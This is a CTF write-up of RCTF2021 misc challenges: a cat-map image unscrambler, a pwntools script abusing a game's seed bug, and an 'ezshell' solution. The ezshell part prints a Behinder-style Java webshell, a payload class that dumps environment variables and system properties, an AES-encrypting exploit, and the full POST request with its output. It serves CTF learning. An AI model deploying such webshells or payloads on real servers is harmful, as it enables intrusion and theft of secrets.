RCTF2021 MISC ALL WriteUp

misc?all stack!

welcome_to_rctf

just go ROIS

图片[1]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

CheckIn

little wired,when you post issuse, then actions will work

图片[2]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇
图片[3]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

you can see,your issues, is on there.the flag always ***,

This means that when I enter the correct five-digit number, it will be replaced with ***, and then just find someone else’s actions.

i find it

图片[4]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

the flag is 52079,solved!

coolcat

图片[5]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

open the link,i saw,visit/getImage

图片[6]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

wow,cool pic

in /upload,i upload a pic then i get wired pic

图片[7]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

So let’s take a look at the code

 def ACM(img, p, q, m):
    counter = 0

    if img.mode == "P":
        img = img.convert("RGB")

    assert img.size[0] == img.size[1]

    while counter < m:
        dim = width, height = img.size

        with Image.new(img.mode, dim) as canvas:
            for x in range(width):
                for y in range(height):
                    nx = (x + y * p) % width
                    ny = (x * q + y * (p * q + 1)) % height

                    canvas.putpixel((nx, ny), img.getpixel((x, y)))

        img = canvas
        counter += 1

    return canvas

# My image was encrypted by ACM ,  but I lost the p ,q  and m ......

I dont know about p and q and m,but i can confirm,the m is random.

So, I made a special picture to certify my idea,The /getImage pic size is 600×600,so do i.

from PIL import Image

with Image.new('RGB',(600,600),(0,0,0)) as pic:
    pic.putpixel((0,1),(255,255,255))
    pic.save('C:/Users/Snowywar/Desktop/e99aa4e9b7fc4ed5a74a590a63b131e6/1.jpg')
    pic.show()

i got this pic,

图片[8]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

upload,then I got a variety of different results. Since the number of m is random, then there must be a situation where m=1, and the values ​​of p and q can be directly calculated. And I conducted a test. m (the number of runs), more run then points obtained will be farther away from the original points.

After many tests, I got the closest point

图片[9]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

use photoshop,i got this coordinate,(66,66)

But I still need /getImage when m=1, and continue to test many times.

finally,I got this one

图片[10]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

using my py, i can get flag.

from PIL import Image

img = Image.open('./tes1.jpg')

if img.mode == "P":
        img = img.convert("RGB")

assert img.size[0] == img.size[1]

dim = width, height = img.size
p= 66
q= 66


with Image.new(img.mode, dim) as canvas:
    for nx in range(width):
        for ny in range(height):
            y = (ny-nx*q)%600
            x = (nx-y*p)%height

            canvas.putpixel((x, y), img.getpixel((nx, ny)))

canvas.show()
图片[11]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

It is wasnt rabbit?

Monopoly

a game,need 10 million win the game.

The game of luck does not even require reverse analysis of the program.

When you choose hard mode, it will let you enter seed, which determines your next steps and behavior

When I was playing here again, I found that press 4 to return to the difficulty selection, and then press 3 to return to the difficulty mode. He will let you enter a new seed, but the amount of money remains the same. Maybe this is a bug.

At the same time, the number of steps in the first step of different seeds is also fixed, indicating that it is pseudo-random.

this is my seed and test.

图片[12]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

I found that when the seed is 22, the amount of money will be triggered to double, and I wrote a looping script to get the flag

from pwn import *
import re
import time

p=remote("123.60.25.24",20031)

context.log_level="debug"
p.recvuntil('your name?\n')
p.sendline('haha')
p.recvuntil('want play\n')
p.sendline('3')
p.recvuntil('win the game!\n')
p.sendline('22')
for i in range(999999):
    #money = p.recvline('your money')
    
    #if p.recvuntil('RCTF'):
     #   print(p.recvuntil('RCTF'))
    p.recvuntil('want play\n')
    p.sendline('4')
    p.recvuntil('want play\n')
    p.sendline('3')
    p.recvuntil('win the game!\n')
    p.sendline('22')
    p.recvuntil('want play\n')
    p.sendline('4')
    p.recvuntil('want play\n')
    p.sendline('3')
    p.recvuntil('win the game!\n')
    p.sendline('22')
    
图片[13]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

ezshell

Is really misc? I dont think so.

Download the war package

protected void service(HttpServletRequest request, HttpServletResponse response) {
        try {
            String k;
            if (request.getMethod().equals("POST")) {
                response.getWriter().write("post");
                k = "e45e329feb5d925b";
                HttpSession session = request.getSession(); //Generate session, the next line is also
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
                byte[] evilClassBytes = (new BASE64Decoder()).decodeBuffer(request.getReader().readLine()); //Read the content of the post request package
                class U extends ClassLoader { //Override the class loader so that it can load any malicious class                    U(ClassLoader c) {
                        super(c);
                    }
                    public Class g(byte[] b) {
                        return super.defineClass(b, 0, b.length);
                    }
                }
                Class evilClass = (new U(this.getClass().getClassLoader())).g(c.doFinal(evilClassBytes)); //Decrypt the post data packet basedecode and then AES
                Object a = evilClass.newInstance();
                Method b = evilClass.getMethod("e", Object.class, Object.class); 
                b.invoke(a, request, response); 
            } else {
                //download war
        } catch (Exception var10) {
    }
}

so,Write a malicious class and let him call it

payload.java

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.util.*;
​
public class payload{
    public void e(Object req, Object res) throws IOException, InterruptedException {
​
        HttpServletRequest req1 = (HttpServletRequest)req;
        HttpServletResponse res1 = (HttpServletResponse)res;
        StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
        Map<String, String> env = System.getenv();
        Iterator var7 = env.keySet().iterator();
​
        while(var7.hasNext()) {
            String name = (String)var7.next();
            basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
        }
​
        basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
        Properties props = System.getProperties();
        Set<Map.Entry<Object, Object>> entrySet = props.entrySet();
        Iterator var9 = entrySet.iterator();
​
        while(var9.hasNext()) {
            Map.Entry<Object, Object> entry = (Map.Entry)var9.next();
            basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
        }
​
        String currentPath = (new File("")).getAbsolutePath();
        String driveList = "";
        File[] roots = File.listRoots();
        File[] var14 = roots;
        int var13 = roots.length;
​
        for(int var12 = 0; var12 < var13; ++var12) {
            File f = var14[var12];
            driveList = driveList + f.getPath() + ";";
        }
​
        String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
        Map<String, String> entity = new HashMap();
        res1.getWriter().write(basicInfo.toString()+"<br>");
        res1.getWriter().write(currentPath+"<br>");
        res1.getWriter().write(driveList+"<br>");
        res1.getWriter().write(osInfo+"<br>");
    }
}

But its not work.I saw the hint.

图片[14]-RCTF2021 MISC ALL WriteUp-魔法少女雪殇

i know.

BehinderV2.0 unpack it to locate the equals function

public boolean equals(Object obj) {
        PageContext page = (PageContext)obj;
        page.getResponse().setCharacterEncoding("UTF-8");
        String result = "";
​
        try {
            StringBuilder basicInfo = new StringBuilder("<br/><font size=2 color=red>Environment variable:</font><br/>");
            Map<String, String> env = System.getenv();
            Iterator var7 = env.keySet().iterator();
​
            while(var7.hasNext()) {
                String name = (String)var7.next();
                basicInfo.append(name + "=" + (String)env.get(name) + "<br/>");
            }
​
            basicInfo.append("<br/><font size=2 color=red>JRE System properties:</font><br/>");
            Properties props = System.getProperties();
            Set<Entry<Object, Object>> entrySet = props.entrySet();
            Iterator var9 = entrySet.iterator();
​
            while(var9.hasNext()) {
                Entry<Object, Object> entry = (Entry)var9.next();
                basicInfo.append(entry.getKey() + " = " + entry.getValue() + "<br/>");
            }
​
            String currentPath = (new File("")).getAbsolutePath();
            String driveList = "";
            File[] roots = File.listRoots();
            File[] var14 = roots;
            int var13 = roots.length;
​
            for(int var12 = 0; var12 < var13; ++var12) {
                File f = var14[var12];
                driveList = driveList + f.getPath() + ";";
            }
​
            String osInfo = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");
            Map<String, String> entity = new HashMap();
            entity.put("basicInfo", basicInfo.toString());
            entity.put("currentPath", currentPath);
            entity.put("driveList", driveList);
            entity.put("osInfo", osInfo);
            result = this.buildJson(entity, true);
            String key = page.getSession().getAttribute("u").toString();
            ServletOutputStream so = page.getResponse().getOutputStream();
            so.write(Encrypt(result.getBytes(), key));
            so.flush();
            so.close();
            page.getOut().clear();
        } catch (Exception var15) {
            var15.printStackTrace();
        }
​
        return true;
    }

Isn’t this just outputting environment variables?

Generate base64 payload data

exp

import com.sun.xml.internal.messaging.saaj.util.Base64;
import org.junit.jupiter.api.Test;
import sun.misc.BASE64Decoder;
import sun.misc.BASE64Encoder;
​
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.Enumeration;
​
public class test1 extends HttpServlet {
    @Test
    public void test() throws IOException, NoSuchPaddingException, NoSuchAlgorithmException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException {
        String k = "e45e329feb5d925b";
        Cipher c = Cipher.getInstance("AES");
        c.init(1, new SecretKeySpec(k.getBytes(), "AES"));
        FileInputStream fileInputStream = new FileInputStream(new File("payload.class"));
        int n = 0 ;
        //i dont know how to wirte auto length,so I measured it manually
        byte[] buffer = new byte[3525];
        n = fileInputStream.read(buffer);
        System.out.println(n);
        System.out.println(Arrays.toString(buffer));
        byte[] bytes = c.doFinal(buffer);
        System.out.println(Arrays.toString(bytes));
        String s = (new BASE64Encoder()).encodeBuffer(bytes);
        System.out.println(s);
    }
}
​

Note that the bytes length must be accurate

POST

POST /shell HTTP/1.1
Host: 124.70.137.88:60080
Content-Length: 4716
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://124.70.137.88:60080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://124.70.137.88:60080/shell
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-CN;q=0.7,zh;q=0.6
Cookie: JSESSIONID=EDF504EDA8DBEE209AEC526FCAADD8DC
Connection: close

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

back

...
<br/>
TOMCAT_ASC_URLS=https://www.apache.org/dyn/closer.cgi?action=download&filename=tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://www-us.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://www.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.41/bin/apache-tomcat-8.5.41.tar.gz.asc
<br/>
ffl4444gg=RCTF{e2zzzz5h333ll_sooo_ez}
<br/>
JAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jre
<br/>
...
© 版权声明
THE END
喜欢就支持一下吧
点赞4 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情

    暂无评论内容